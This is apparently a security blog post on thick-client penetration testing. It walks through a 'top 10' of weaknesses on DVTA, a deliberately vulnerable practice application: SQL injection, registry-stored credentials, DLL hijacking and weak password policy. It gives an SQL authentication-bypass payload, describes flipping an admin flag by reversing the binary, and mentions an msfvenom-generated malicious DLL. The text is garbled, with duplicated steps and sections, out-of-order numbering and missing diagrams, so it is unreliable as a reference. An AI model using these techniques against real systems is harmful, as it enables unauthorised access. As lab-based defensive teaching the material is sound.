Introduction:
Thick client penetration testing is an important task that needs to be done with every thick client application because thick clients have two attack surfaces first one is static and the other one is dynamic. They are different from a website where the user simply surf a URL in the browser and all the task are performed at the server end. There is no dependency on the client's operating system and other resources on the client machine. In the case of thick client penetration testing, most of the tasks are performed at the client end So it heavily depends on the client's system resources like CPU, memory, RAM, etc.Types of thick client:
(1) Thick client applications can be divided into two parts based on proxy settings:
(1.1) Proxy aware thick client: These are those thick clients who have proxy settings in it so the outgoing and incoming traffic can be sent to the proxy server and then to the main server.
(1.2) Proxy unaware thick client: These are those thick clients who don't have proxy settings in themself. So in order to send their traffic to the proxy server, the user needs to make some changes in the system's host file.
(2) Thick client can be divided into two parts based on their architecture:
(2.1) Two-tier thick client: These are those thick clients who directly communicate to the database server in order to execute user-defined tasks as shown in below diagram 1.1.
(3) https://parsiya.net/blog/2018-07-15-dvta-part-1-setup/
Diagram 1.1
(2.2) Three-tier thick client application: These applications don't have proxy settings in them. So these applications send traffic directly to the main server. In order to send the traffic to a proxy server, necessary changes need to be done in the system host file.
Diagram 1.2
(3) Thick client can be divided into two parts as shown below:
(3.1) exe files or
(3.2) web-based launcher like a java-based application.
(4) They can also be divided into based on the programming languages used:
(4.1) .NET thick client
(4.2) C/C++ thick client
(4.3) Java-based thick client
Now since all the basics are covered now for the thick client so it's time to talk about the Lucideus thick client top 10.
1. Injection: In the case of thick client applications, injection attacks like SQLI, XML injection, CSV injection, etc are also possible as most of 3-tier thick client applications use HTTP protocol for server communication. For demonstrating the injection attacks in thick client application DVTA ( Damn vulnerable thick client application) can be used.
Step 2: As can be seen in below diagram 1.4, the attacker is able to login to the application.
Now since all the basics are covered now for the thick client so it's time to talk about the Lucideus thick client top 10.
Diagram 1.3
1. Injection: In the case of thick client applications, injection attacks like SQLI, XML injection, CSV injection, etc are also possible as most of 3-tier thick client applications use HTTP protocol for server communication. For demonstrating the injection attacks in thick client application DVTA ( Damn vulnerable thick client application) can be used.
1.1 SQLI:- Like Web application, the thick client application may have SQLI as they connect to the database for authentication or fetching some data for application workflow.
Step 1: Launch the DVTA application and inject the SQL authentication bypass payload 1' or '1'='1 in username and password field.
Diagram 1.4
Diagram 1.5
Note: Rest of the web vulnerabilities are also possible in thick clients except some like XSS and CSRF which are browser-based.
2. Broken Access control: Broken access control can be found in the thick client application in HTTP traffic or by modifying the source code. Here using DVTA, by modifying the application source code, attacker can achieve the privilege escalation.
Step 1: Reverse the DVTA application and change the value of isadmin variable from 1 to 0 and rebuild the it.
Step 1: Reverse the DVTA application and change the value of isadmin variable from 1 to 0 and rebuild the it.
Diagram 1.6
Diagram 1.7
Step 2: Login to the DVTA application with general user rebecca and user get logged in with admin account.
Diagram 1.8
Diagram 1.9
3. Insecure local storage: DVTA application store sensitive data like user credentials in windows registry and memory strings.
Diagram 1.10
4. Hardcoded sensitive information: sensitive information like ftp credentials are hardcoded in application file admin.cs.
8. Weak code quality: Application source code quality need to be maintained. In DVTA application, there is no integrity checks and code is not obfuscated. Even anti reverse engineering protection is also not implemented. For lack of code obfuscation PoC is given below.
9. Weak Configuration management: Application can store the credentials in configuration files. In DVTA application, database credentials are stored in the configuration file.
Diagram 1.11
5. Unencrypted communication: In DVTA application FTP server credentials are transferred in the application traffic in plain text.
Diagram 1.12
6. DLL Hijacking: DVTA application is vulnerable to DLL hijacking attacks. A malicious dll file generated using msfvenom can be inject in the application folder which later get executed during run time and open-up the calculator in the system.
Diagram 1.13
Diagram 1.14
7. Insecure password management: In DVTA application, user can create account with any password. There is no password policy defined. Attacker can use bruteforce to get the user password easily. As can be seen in below diagram 1.15 , User create a account by setting the password value 2 which is quite easy password for guessing attack.
diagram 1.15
Diagram 1.16
9. Weak Configuration management: Application can store the credentials in configuration files. In DVTA application, database credentials are stored in the configuration file.
Diagram 1.17
10. Security misconfiguration: Servers which handle the application traffic need to be configured properly. In the case of DVTA application, database server version is being disclosed in the server's response. It can help attacker to find the publicly available exploit for the old server version.
Diagram 1.18
Conclusion:
As the thick client applications have two attack surfaces like static and dynamic so a vulnerability assessment need to be done on it in order to ensure that thick client applications are ready to fight against the cybercriminal.
References:
(1) http://tutorials.jenkov.com/software-architecture/client-server-architecture.html
(2) https://www.softscheck.sg/thick-client-penetration-testing/(3) https://parsiya.net/blog/2018-07-15-dvta-part-1-setup/
Article Link: https://blog.lucideus.com/2020/06/lucideus-thick-client-top-10-attacks-you-need-to-use-as-standard.html